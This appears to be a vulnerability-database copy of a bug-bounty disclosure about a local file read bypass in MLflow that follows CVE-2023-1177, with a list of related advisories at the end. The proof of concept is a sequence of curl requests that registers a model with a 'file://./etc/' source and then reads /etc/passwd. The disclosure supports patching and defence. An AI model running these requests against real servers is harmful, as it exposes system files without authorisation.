Lucene search
IamnoooobB12B0073-0BB0-4BD1-8FC2-EC7F17FD7689HistoryMar 27, 2023 - 11:20 a.m.
Local File Read Bypass in mlflow/mlflow
2023-03-2711:20:57
iamnoooob
www.huntr.dev
19
local file read
mlflow
bypass
ajax-api
file vulnerability
security bug
0.039 Low
EPSS
Percentile
92.0%
Description
This is a bypass to the following submission <https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/> which was assigned CVE-2023-1177.
Proof of Concept
Start the server or UI (it works on both identically)
mlflow ui --host 127.0.0.1:5000
- Create a Model named “AJAX-API”.
curl -i -s -k -X $'POST' -H $'Host: 127.0.0.1:5000' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://127.0.0.1:5000/' -H $'Content-Type: application/json; charset=utf-8' -H $'Origin: http://127.0.0.1:5000' -H $'Connection: close' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' --data-binary $'{"name":"AJAX-API"}' $'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'
- Register Model Version and notice the “source” JSON property in the request contains
file://./etc/. Iffile:///etc/is used an exception is thrown due to the check present inis_local_urimethod.
curl -i -s -k -X $'POST' -H $'Host: 127.0.0.1:5000' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://127.0.0.1:5000/' -H $'Content-Type: application/json; charset=utf-8' -H $'Origin: http://127.0.0.1:5000' -H $'Connection: close' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' --data-binary $'{"name":"AJAX-API","source":"file://./etc/"}' $'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create
Response:
{
"model_version": {
"name": "AJAX-API",
"version": "1",
"creation_timestamp": 1679914680236,
"last_updated_timestamp": 1679914680236,
"current_stage": "None",
"description": "",
"source": "file://./etc/",
"run_id": "",
"status": "READY",
"run_link": ""
}
}
- Note the version number from the previous response and make the following cURL request.
curl http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version number}}
Notice the contents of /etc/passwd file in the response.
Related
github
github
mlflow Path Traversal vulnerability
2023-05-17 21:30:22
mlflow is vulnerable to remote file access in `mlflow server` and `mlflow ui` CLIs
2023-03-24 22:01:09
Remote file access vulnerability in `mlflow server` and `mlflow ui` CLIs
2023-05-01 13:43:58
osv
osv
mlflow Path Traversal vulnerability
2023-05-17 21:30:22
BIT-mlflow-2023-1177
2024-03-06 10:59:15
CVE-2023-1177
2023-03-24 15:15:10
nuclei
nuclei
Mlflow <2.2.1 - Local File Inclusion
2023-03-27 13:58:17
Mlflow <2.3.1 - Local File Inclusion Bypass
2023-05-22 10:26:58
prion
prion
Path traversal
2023-03-24 15:15:00
Path traversal
2023-05-17 21:15:00
nvd
nvd
CVE-2023-1177
2023-03-24 15:15:10
CVE-2023-2780
2023-05-17 21:15:09
githubexploit
githubexploit
Exploit for Path Traversal in Lfprojects Mlflow
2023-11-20 18:32:46
Exploit for Path Traversal in Lfprojects Mlflow
2023-07-23 10:12:27
cvelist
cvelist
CVE-2023-1177 Path Traversal: '\..\filename' in mlflow/mlflow
2023-03-24 00:00:00
CVE-2023-2780 Path Traversal: '\..\filename' in mlflow/mlflow
2023-05-17 00:00:00
cve
cve
CVE-2023-1177
2023-03-24 15:15:10
CVE-2023-2780
2023-05-17 21:15:09
huntr
huntr
LFI/RFI in MLflow
2023-03-03 17:15:07
veracode
veracode
Path Traversal
2023-03-30 03:46:14
Path Traversal
2023-05-23 04:46:49